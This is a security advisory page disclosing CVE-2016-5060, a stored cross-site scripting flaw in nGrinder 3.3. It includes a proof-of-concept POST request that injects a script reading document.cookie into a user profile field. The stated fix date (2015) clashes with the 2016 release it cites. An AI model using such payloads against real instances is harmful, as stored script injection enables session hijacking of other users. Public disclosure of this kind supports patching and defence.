nGrinder 3.3 Cross Site Scripting

2016.06.15
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Title: CVE-2016-5060 Stored Cross-Site Scripting vulnerability in nGrinder Author: lukasz.juszczyk at ingservicespolska.pl Date: 25.03.2016 Affected software : ============= nGrinder v3.3 http://naver.github.io/ngrinder/ Description : ============= nGrinder is a platform for stress tests that enables you to execute script creation, test execution, monitoring, and result report generator simultaneously. The open-source nGrinder offers easy ways to conduct stress tests by eliminating inconveniences and providing integrated environments. Proof of Concept ============= Vulnerable parameters: description, email, username Request: -------------------------------------------------------------------------------- POST /user/save HTTP/1.1 Host: 127.0.0.1:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:8080/home Cookie: ngrinder_lang=en; announcement_hide=true; JSESSIONID=1q0594qovhyj51ejxrqdkjmycp Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 178 userId=test1&id=80&userName=test1&email=&description=Stored+XSS%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&mobilePhone=&followersStr=&password=p4$$w0rd&confirmPassword= -------------------------------------------------------------------------------- Fix ============= Upgrade to nGrinder 3.4 released on 24.05.2015. References ============= https://github.com/naver/ngrinder/releases/tag/ngrinder-3.4-20160525 https://github.com/naver/ngrinder/issues/103 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5060

References:

http://naver.github.io/ngrinder/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top